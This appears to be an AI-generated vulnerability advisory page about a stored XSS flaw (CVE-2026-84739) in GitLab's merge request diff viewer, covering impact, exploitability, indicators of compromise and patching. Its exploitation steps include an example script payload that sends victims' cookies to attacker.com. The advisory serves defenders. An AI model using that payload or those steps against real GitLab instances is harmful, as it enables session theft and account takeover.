CVE-2026-84739: 
GitLab Analisi e mitigazione delle vulnerabilità

Panoramica

CVE-2026-84739 is a stored Cross-Site Scripting (XSS) vulnerability in GitLab CE/EE affecting all versions from 13.11 through 19.2.6, 19.3.0 through 19.3.2, and 19.4.0. The flaw exists due to improper sanitization of path components in the merge request diff viewer, allowing an authenticated user to execute arbitrary JavaScript in another user's browser session under certain conditions. It was published on September 29, 2026, with patches released the same day. The vulnerability carries a CVSS v3.1 base score of 8.7 (High) (GitHub Advisory, GitLab Patch Release).

Dettagli tecnici

The root cause is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting). Specifically, path components submitted as part of merge request diffs are not properly sanitized before being rendered in the diff viewer, enabling injection of malicious JavaScript. An authenticated attacker with at least Developer-level access (sufficient to create merge requests) can craft a repository with a maliciously named file path containing JavaScript payloads; when a victim user views the merge request diff, the script executes in their browser session. Exploitation requires user interaction (the victim must view the diff) but no elevated privileges beyond basic authentication (GitHub Advisory).

Impatto

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of a victim user's browser session, enabling theft of session tokens, account impersonation, and unauthorized actions performed on behalf of the victim within the GitLab instance. Both confidentiality and integrity are rated High in the CVSS scoring, with scope marked as Changed — meaning the impact extends beyond the attacker's own session to affect other users' sessions. Availability is not directly impacted, but session hijacking could lead to broader compromise of the GitLab environment, including access to private repositories, CI/CD pipelines, and sensitive project data (GitHub Advisory, GitLab Patch Release).

Sfruttabilità

As of the disclosure date, there is no public proof-of-concept exploit code and no evidence of in-the-wild exploitation (GitHub Advisory). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.362% (28th percentile), indicating a relatively low near-term exploitation probability. The vulnerability is not automatable (requires user interaction), which reduces mass-exploitation risk, though targeted attacks against high-value GitLab users remain plausible.

Passaggi di sfruttamento

  1. Reconnaissance: Identify a target GitLab CE/EE instance running a vulnerable version (13.11–19.2.6, 19.3.0–19.3.2, or 19.4.0) and obtain an authenticated account with at least Developer-level access to create merge requests.
  2. Craft malicious repository content: Create or modify a file within a repository using a filename or path that contains a JavaScript XSS payload (e.g., <script>document.location='https://attacker.com/steal?c='+document.cookie</script>) that exploits the unsanitized path rendering in the diff viewer.
  3. Create a merge request: Open a merge request introducing the maliciously named file, generating a diff that will be displayed to reviewers or maintainers.
  4. Social engineering: Entice or wait for a target user (e.g., a project maintainer or administrator) to view the merge request diff in their browser.
  5. JavaScript execution: When the victim loads the diff viewer page, the unsanitized path component renders as executable JavaScript in their browser session, triggering the payload.
  6. Session hijacking or further action: The payload exfiltrates the victim's session token or performs actions (e.g., adding SSH keys, modifying CI/CD pipelines) on their behalf within the GitLab instance (GitHub Advisory).

Indicatori di compromesso

  • Network: Outbound HTTP requests from a victim's browser to an external attacker-controlled domain shortly after viewing a GitLab merge request diff; unusual GET/POST requests containing encoded cookie or token data to unknown external hosts.
  • Logs: GitLab application logs showing access to merge request diff pages followed by anomalous API calls (e.g., SSH key additions, personal access token creation) from the same session; web server access logs with unusual referrer headers originating from merge request diff URLs.
  • File System / Repository: Presence of files with unusually named paths containing HTML/JavaScript special characters (<, >, ", ', script) in repository commit history.
  • Session/Account Activity: Unexpected account actions (new SSH keys, new access tokens, changed settings) performed by users who recently reviewed merge requests, particularly outside normal working hours.

Mitigazione e soluzioni alternative

GitLab has released patched versions 19.2.7, 19.3.3, and 19.4.1 addressing this vulnerability; upgrading to one of these versions is the recommended remediation (GitLab Patch Release). For organizations unable to patch immediately, restricting access to merge request diff viewing or temporarily disabling the merge request diff viewer can reduce exposure. Additionally, enforcing strict Content Security Policy (CSP) headers on the GitLab instance may limit the impact of XSS payloads. GitLab.com (SaaS) users are automatically protected as the platform is updated by GitLab.

Reazioni della comunità

The patch release was covered by several security news outlets including SecurityOnline, CyberSecurityNews, Heise, and Cryptika, primarily in the context of a broader GitLab critical patch release that also addressed other high-severity vulnerabilities (GitLab Patch Release). Community discussion on Bluesky and security aggregators noted the vulnerability alongside more severe RCE issues in the same release cycle, which drew comparatively more attention. No notable individual researcher commentary specific to CVE-2026-84739 has been identified beyond the HackerOne report submission.

Risorse aggiuntive


Fonte: Questo report è stato generato utilizzando l'intelligenza artificiale

Imparentato GitLab Vulnerabilità:

CVE ID

Severità

Punteggio

Tecnologie

Nome del componente

Exploit CISA KEV

Ha la correzione

Data di pubblicazione

CVE-2026-93577CRITICAL9.9
  • GitLab logoGitLab
  • gitlab-runner-19.3
NoSìSep 24, 2026
CVE-2026-84739HIGH8.7
  • GitLab logoGitLab
  • cpe:2.3:a:gitlab:gitlab
NoSìSep 29, 2026
CVE-2026-8937MEDIUM4.3
  • GitLab logoGitLab
  • cpe:2.3:a:gitlab:gitlab
NoSìSep 29, 2026
CVE-2026-10518MEDIUM4.3
  • GitLab logoGitLab
  • cpe:2.3:a:gitlab:gitlab
NoSìSep 29, 2026
CVE-2026-4523LOW3.7
  • GitLab logoGitLab
  • cpe:2.3:a:gitlab:gitlab
NoSìSep 29, 2026

Valutazione gratuita delle vulnerabilità

Benchmark della tua posizione di sicurezza del cloud

Valuta le tue pratiche di sicurezza cloud in 9 domini di sicurezza per confrontare il tuo livello di rischio e identificare le lacune nelle tue difese.

Richiedi valutazione

Richiedi una demo personalizzata

Pronti a vedere Wiz in azione?

"La migliore esperienza utente che abbia mai visto offre piena visibilità ai carichi di lavoro cloud."
David EstlickCISO (CISO)
"Wiz fornisce un unico pannello di controllo per vedere cosa sta succedendo nei nostri ambienti cloud."
Adam FletcherResponsabile della sicurezza
"Sappiamo che se Wiz identifica qualcosa come critico, in realtà lo è."
Greg PoniatowskiResponsabile della gestione delle minacce e delle vulnerabilità